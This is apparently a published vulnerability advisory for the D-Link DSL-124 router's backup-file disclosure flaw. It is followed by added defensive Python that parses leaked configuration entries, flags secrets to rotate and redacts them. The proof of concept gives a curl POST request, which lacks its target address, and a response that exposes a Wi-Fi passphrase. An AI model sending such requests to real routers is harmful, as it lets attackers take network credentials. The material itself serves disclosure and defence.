# Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure  
# Date: 2022-11-10  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage:  
# Software Link:  
# Firmware Version: ME_1.00  
# Tested on: Windows 11  
# [ Details - DSL-124 ]:  
# The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office.  
# With integrated ADSL2/2+ supporting download speeds up to 24 Mbps, firewall protection,  
# Quality of Service (QoS), 802.11n wireless LAN, and four Ethernet switch ports,  
# the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.  
# [ Description ]:  
# After the administrator logs in and a new session is created, an attacker can send a POST request from her own system  
# and, in response, receive a complete backup of the router settings.  
# This happens because of the lack of user and session management on the router: the request is not tied to the administrator's session.  
# [ POC ]:  
Request :  
curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST  
Response :  
HTTP/1.1 200 OK  
Connection: close  
Server: Virtual Web 0.9  
Content-Type: application/octet-stream;  
Content-Disposition: attachment;filename="config.img"  
Pragma: no-cache  
Cache-Control: no-cache  
<V N="WLAN_WPA_PSK" V="pass@12345"/>  
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>  
<V N="WLAN_ENABLE_1X" V="0x0"/>  
<V N="WLAN_RS_IP" V=""/>
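
Added example (not part of the original advisory or the vendor's code): for the defender's side of this disclosure, the Python below parses the `<V N="..." V="..."/>` entries shown in the response, lists which stored secrets have to be rotated once a backup has leaked, and produces a redacted copy that is safe to attach to an incident ticket. Only `WLAN_WPA_PSK` and `WLAN_WPA_PSK_FORMAT` are confirmed by the page; the other secret-name hints are assumptions.

```python
import re

# One setting per entry, in the form seen in the response body above.
ENTRY_RE = re.compile(r'<V\s+N="([^"]*)"\s+V="([^"]*)"\s*/>')

# Assumption: substrings that mark a setting as a stored secret.
# Only WLAN_WPA_PSK is confirmed by the page; the rest are guesses.
SECRET_HINTS = ("PSK", "PASS", "PWD", "KEY", "SECRET")
# Metadata about a secret, not the secret itself (WLAN_WPA_PSK_FORMAT on the page).
NON_SECRET_SUFFIXES = ("_FORMAT",)

# The four entries quoted in the advisory's response excerpt.
SAMPLE = '''<V N="WLAN_WPA_PSK" V="pass@12345"/>
<V N="WLAN_WPA_PSK_FORMAT" V="0x0"/>
<V N="WLAN_ENABLE_1X" V="0x0"/>
<V N="WLAN_RS_IP" V=""/>
'''

def parse_entries(text):
    """Return (name, value) pairs in file order."""
    return ENTRY_RE.findall(text)

def is_secret(name, value):
    """True when the entry holds a non-empty credential-like value."""
    upper = name.upper()
    if not value or upper.endswith(NON_SECRET_SUFFIXES):
        return False
    return any(hint in upper for hint in SECRET_HINTS)

def secrets_to_rotate(text):
    """Names of the secrets that were readable in the leaked backup."""
    return [name for name, value in parse_entries(text) if is_secret(name, value)]

def redact(text):
    """Copy of the backup with secret values masked, other entries untouched."""
    def mask(match):
        name, value = match.group(1), match.group(2)
        if is_secret(name, value):
            return '<V N="%s" V="********"/>' % name
        return match.group(0)
    return ENTRY_RE.sub(mask, text)

if __name__ == "__main__":
    print("rotate:", secrets_to_rotate(SAMPLE))
    print(redact(SAMPLE))
```
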